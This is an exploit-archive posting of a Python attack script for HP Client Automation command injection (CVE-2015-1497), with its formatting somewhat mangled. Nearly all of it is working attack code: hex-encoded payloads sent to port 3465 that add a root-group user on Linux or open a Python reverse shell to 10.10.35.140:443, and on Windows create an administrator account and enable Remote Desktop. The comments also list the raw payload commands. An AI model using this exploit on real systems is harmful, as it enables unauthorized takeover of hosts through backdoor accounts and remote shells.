HP Client - Automation Command Injection
Posted on 30 November -0001
<HTML><HEAD><TITLE>HP Client - Automation Command Injection</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># Exploit Title: [HP Client - Automation Command Injection] # Date: [10/10/2016] # Exploit Author: [SlidingWindow] , Twitter: @kapil_khot # Vendor Homepage: [Previosuly HP, now http://www.persistentsys.com/] # Version: [Tested on version 7.9 but should work on 8.1, 9.0, 9.1 too] # Tested on: [Windows 7 and CentOS release 6.7 (Final)] # CVE : [CVE-2015-1497] #Can run following commands on linux target #Useradd Payload: hide hide sh -c ' useradd amiroot -p ID/JlXFIWowsE -g root' #Reverse Shell Payload: hide hide sh -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.35.140",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'" #Runs following commands on Windows target #hide hide cmd.exe /c net user hack3r "hack3r" /add #hide hide cmd.exe /c net localgroup administrators hack3r /add #hide hide cmd.exe /c net localgroup "Remote Desktop Users" hack3r /add #hide hide cmd.exe /c netsh firewall set service RemoteDesktop enable #hide hide cmd/exe /c netsh firewall set service type=RemoteDesktop mode=enable profile=ALL #hide hide cmd/exe /c reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f import sys,socket print(" # Exploit Title: [HP Client - Automation Command Injection] # Date: [10/10/2016] # Exploit Author: [SlidingWindow] , Twitter: @kapil_khot # Vendor Homepage: [Previosuly HP, now http://www.persistentsys.com/] # Version: [7.9, 8.1, 9.0, 9.1] # Tested on: [Windows 7, CentOS release 6.7 (Final)] # CVE : [CVE-2015-1497] ") def exploit_Linux(target_IP,exploit_param): if exploit_param == "1": print(" [+]Adding privileged user amiroot/nopass") request = "x00" request+= "x31x32x33x31x32x33x00" request+= "x41x42x43x00" request+= "x68x69x64x65x20x68x69x64x65x09x73x68x20x2dx63x20x27x20x75x73x65x72x61x64x64x20x61x6dx69x72x6fx6fx74x20x2dx70x20x49x44x2fx4ax6cx58x46x49x57x6fx77x73x45x20x20x2dx67x20x72x6fx6fx74x27x00" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_IP, 3465)) s.send(request) response = s.recv(1024) if response == "x00": print("[+]Successfully added user amiroot/nopass") else: print("[-]Failed to add user amiroot/nopass") s.close() elif exploit_param == "2": print(" [+]Trying to get a reverse shell") request = "x00" request+= "x31x32x33x31x32x33x00" request+= "x41x42x43x00" #Change this #Reverse Shell Payload: hide hide sh -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.35.140",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'" request+= "x68x69x64x65x20x68x69x64x65x09x73x68x20x2dx63x20x22x70x79x74x68x6fx6ex20x2dx63x20x27x69x6dx70x6fx72x74x20x73x6fx63x6bx65x74x2cx73x75x62x70x72x6fx63x65x73x73x2cx6fx73x3bx73x3dx73x6fx63x6bx65x74x2ex73x6fx63x6bx65x74x28x73x6fx63x6bx65x74x2ex41x46x5fx49x4ex45x54x2cx73x6fx63x6bx65x74x2ex53x4fx43x4bx5fx53x54x52x45x41x4dx29x3bx73x2ex63x6fx6ex6ex65x63x74x28x28x5cx22x31x30x2ex31x30x2ex33x35x2ex31x34x30x5cx22x2cx34x34x33x29x29x3bx6fx73x2ex64x75x70x32x28x73x2ex66x69x6cx65x6ex6fx28x29x2cx30x29x3bx20x6fx73x2ex64x75x70x32x28x73x2ex66x69x6cx65x6ex6fx28x29x2cx31x29x3bx20x6fx73x2ex64x75x70x32x28x73x2ex66x69x6cx65x6ex6fx28x29x2cx32x29x3bx70x3dx73x75x62x70x72x6fx63x65x73x73x2ex63x61x6cx6cx28x5bx5cx22x2fx62x69x6ex2fx73x68x5cx22x2cx5cx22x2dx69x5cx22x5dx29x3bx27x22x00" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_IP, 3465)) s.send(request) response = s.recv(1024) if response == "x00": print("[+]Exploit completed successfully. [+]Try to SSH into the target with username/password: amiroot/nopass") else: print("[-]Failed to get reverse shell") s.close() else: print(" [-]Invalid exploit parameter provided for Linux target") sys.exit() def exploit_Windows(target_IP): counter = 0 print("[+]Adding a local user hack3r/hack3r") request = "x00" request+= "x31x32x33x31x32x33x00" request+= "x41x42x43x00" request+= "x68x69x64x65x20x68x69x64x65x09x63x6dx64x2ex65x78x65x20x2fx63x20x6ex65x74x20x75x73x65x72x20x68x61x63x6bx33x72x20x22x68x61x63x6bx33x72x22x20x2fx61x64x64x00" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_IP, 3465)) s.send(request) response = s.recv(1024) if response == "x00": print("[+]Successfully added user hack3r/hack3r") counter+= 1 else: print("[-]Failed to add user hack3r/hack3r") s.close() print("[+]Adding user 'hack3r' to Local Administrator's group") request = "x00" request+= "x31x32x33x31x32x33x00" request+= "x41x42x43x00" request+= "x68x69x64x65x20x68x69x64x65x09x6ex65x74x20x6cx6fx63x61x6cx67x72x6fx75x70x20x61x64x6dx69x6ex69x73x74x72x61x74x6fx72x73x20x68x61x63x6bx33x72x20x2fx61x64x64x00" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_IP, 3465)) s.send(request) response = s.recv(1024) if response == "x00": print("[+]Successfully added user 'hack3r' to Local Administrators group") counter+= 1 else: print("[-]Failed to add user to 'hack3r' Local Administrators group") s.close() #Add user Hack3r to "Remote Desktop Users" Group print("[+]Adding user 'hack3r' to 'Remote Desktop Users' group") request = "x00" request+= "x31x32x33x31x32x33x00" request+= "x41x42x43x00" request+= "x68x69x64x65x20x68x69x64x65x09x63x6dx64x2ex65x78x65x20x2fx63x20x6ex65x74x20x6cx6fx63x61x6cx67x72x6fx75x70x20x22x52x65x6dx6fx74x65x20x44x65x73x6bx74x6fx70x20x55x73x65x72x73x22x20x68x61x63x6bx33x72x20x2fx61x64x64x00" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_IP, 3465)) s.send(request) response = s.recv(1024) if response == "x00": print("[+]Successfully added user 'hack3r' to 'Remote Desktop Users' group") counter+= 1 else: print("[-]Failed to add user 'hack3r' to 'Remote Desktop Users' group") s.close() #Enable RDP print("[+]Trying to enable Remote Desktop Service") request = "x00" request+= "x31x32x33x31x32x33x00" request+= "x41x42x43x00" request+= "x68x69x64x65x20x68x69x64x65x09x63x6dx64x2ex65x78x65x20x2fx63x20x6ex65x74x73x68x20x66x69x72x65x77x61x6cx6cx20x73x65x74x20x73x65x72x76x69x63x65x20x52x65x6dx6fx74x65x44x65x73x6bx74x6fx70x20x65x6ex61x62x6cx65x00" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_IP, 3465)) s.send(request) response = s.recv(1024) if response == "x00": print("[+]Successfully enabled Remote Desktop Service") counter+= 1 else: print("[-]Failed to enable Remote Desktop Service") s.close() #Enable RDP for all profiles print("[+]Trying to enable Remote Desktop Service for all firewall profiles") request = "x00" request+= "x31x32x33x31x32x33x00" request+= "x41x42x43x00" request+= "x68x69x64x65x20x68x69x64x65x09x63x6dx64x2ex65x78x65x20x2fx63x20x6ex65x74x73x68x20x66x69x72x65x77x61x6cx6cx20x73x65x74x20x73x65x72x76x69x63x65x20x74x79x70x65x3dx52x65x6dx6fx74x65x44x65x73x6bx74x6fx70x20x6dx6fx64x65x3dx65x6ex61x62x6cx65x20x70x72x6fx66x69x6cx65x3dx41x4cx4cx00" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_IP, 3465)) s.send(request) response = s.recv(1024) if response == "x00": print("[+]Successfully enabled Remote Desktop Service for all firewall profiles") counter+= 1 else: print("[-]Failed to enable Remote Desktop Service for all firewall profiles") s.close() #Setup target to listen for RDP connections print("[+]Setting up the target server to listen to RDP connections") request = "x00" request+= "x31x32x33x31x32x33x00" request+= "x41x42x43x00" request+= "x68x69x64x65x20x68x69x64x65x09x09x63x6dx64x2ex65x78x65x20x2fx63x20x72x65x67x20x61x64x64x20x22x48x4bx45x59x5fx4cx4fx43x41x4cx5fx4dx41x43x48x49x4ex45x5cx53x59x53x54x45x4dx5cx43x75x72x72x65x6ex74x43x6fx6ex74x72x6fx6cx53x65x74x5cx43x6fx6ex74x72x6fx6cx5cx54x65x72x6dx69x6ex61x6cx20x53x65x72x76x65x72x22x20x2fx76x20x66x44x65x6ex79x54x53x43x6fx6ex6ex65x63x74x69x6fx6ex73x20x2fx74x20x52x45x47x5fx44x57x4fx52x44x20x2fx64x20x30x20x2fx66x00" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_IP, 3465)) s.send(request) response = s.recv(1024) if response == "x00": print("[+]Successfully setup the target server to listen to RDP connections") counter+= 1 else: print("[-]Failed to setup the target server to listen to RDP connections") s.close() if counter == 6: print(" [+]Exploit completed successfully. Try RDP to the target with username/password: hack3r/hack3r") else: print(" [-]Exploit Failed..") #main() function here def main(): if len(sys.argv) < 2: print " [-]Usage: Windows Target: tpython HP_Client_Automation_Exploit.py <target_ip> Windows Linux Target: tpython HP_Client_Automation_Exploit.py <target_ip> Linux [1|2] 1.Add user t 2.Reverse Shell" sys.exit() target_IP = sys.argv[1] target_OS = sys.argv[2].lower() if target_OS == "windows": exploit_Windows(target_IP) elif target_OS == "linux": exploit_param = sys.argv[3] exploit_Linux(target_IP,exploit_param) else: print(" [-]Invalid taret Operating System selected.") sys.exit() if __name__ == '__main__': main() </BODY></HTML>
